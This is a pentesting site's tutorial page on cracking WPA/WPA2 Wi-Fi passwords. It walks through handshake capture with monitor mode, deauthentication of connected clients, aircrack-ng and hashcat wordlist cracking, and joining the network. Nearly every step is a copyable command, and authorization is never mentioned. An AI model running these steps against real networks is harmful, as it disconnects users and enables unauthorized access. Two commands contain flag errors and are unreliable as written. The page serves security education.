Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  • Cracking WPA/WPA2 with Handshake Capture
  • Prerequisites
  • Step-by-Step Process
  1. Wireless Security
  2. Intro to WiFi Pentesting

WPA & WPA2 PSK

Cracking WPA/WPA2 with Handshake Capture

In this tutorial, we'll demonstrate how to crack WPA/WPA2 encrypted networks by capturing the 4-way handshake and then using tools like aircrack-ng and hashcat to crack the password.

Prerequisites

Ensure you have the following:

  • A wireless card that supports monitor mode.

  • The necessary tools: airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, hashcat.

  • A wordlist (e.g., /usr/share/wordlists/rockyou.txt).

Step-by-Step Process

1. Start Interface in Monitor Mode and Kill Unwanted Services

Start by disabling any interfering processes and putting your wireless interface into monitor mode:

airmon-ng check kill && airmon-ng start wlan0

  • airmon-ng check kill: Stops interfering processes.

  • airmon-ng start wlan0: Puts the wireless interface wlan0 into monitor mode (wlan0mon).

2. Scan for Networks

Next, scan for nearby wireless networks to identify the one you want to target:

sudo airodump-ng wlan0mon

3. Scan on Specific AP and Channel with Output File

Once you've identified the target AP, run airodump-ng on the specific network to capture data:

sudo airodump-ng -bssid <BSSID> -c <Channel> -w <WPA1?> wlan0mon

  • <BSSID>: The MAC address of the target AP.

  • <Channel>: The channel number on which the AP is operating.

  • <WPA1?>: The name of the file where you want to save the captured data.

4. De-Authenticate Clients to Capture Handshake

In order to capture the 4-way handshake, de-authenticate a connected client using aireplay-ng:

# Remember, you can also refer to another section for deauthenticating all clients
sudo aireplay-ng -a <BSSID> -c <Client Mac> -0 0 wlan0mon

  • -a <BSSID>: The BSSID of the target AP.

  • -c <Client Mac>: The MAC address of a client connected to the AP.

  • -0 0: Sends deauthentication packets indefinitely until the handshake is captured.

5. Crack the WPA/WPA2 Key Using Aircrack-ng

Once the handshake is captured, use aircrack-ng to crack the password:

sudo aircrack-ng <output_file>.cap -e <ESSID>

  • <output_file>.cap: The capture file containing the handshake.

  • <ESSID>: The name (SSID) of the target network.

You can also use a wordlist for a more efficient brute-force attack:

sudo aircrack-ng <output_file>.cap -e <ESSID> -w /usr/share/wordlists/rockyou.txt

6. Crack the WPA/WPA2 Key Using Hashcat

Alternatively, you can use hashcat for cracking the WPA/WPA2 key. First, convert the .cap file to a hashcat-compatible format:

hcxpcapngtool -o <output_file>.hc22000 <output_file>.cap

  • <output_file>.cap: The original capture file.

  • <output_file>.hc22000: The converted hashcat file.

Next, run hashcat to crack the WPA/WPA2 key:

hashcat -m 22000 <output_file>.hc22000 -w /usr/share/wordlists/rockyou.txt

7. Conclusion

Once the password is cracked, you should have access to the network. Connecting to the Network:

wpa_supplicant -c <filename>.conf

<filename>.conf: The WPA configuration file containing network details.

Request IP from DHCP Server:

sudo dhclient wlan0 -v

By following these steps, you'll be able to crack the WPA/WPA2 password and gain access to the network.

PreviousWPA-PSK NetworksNextWPA2 & WPA3 Enterprise Networks

Last updated 19 days ago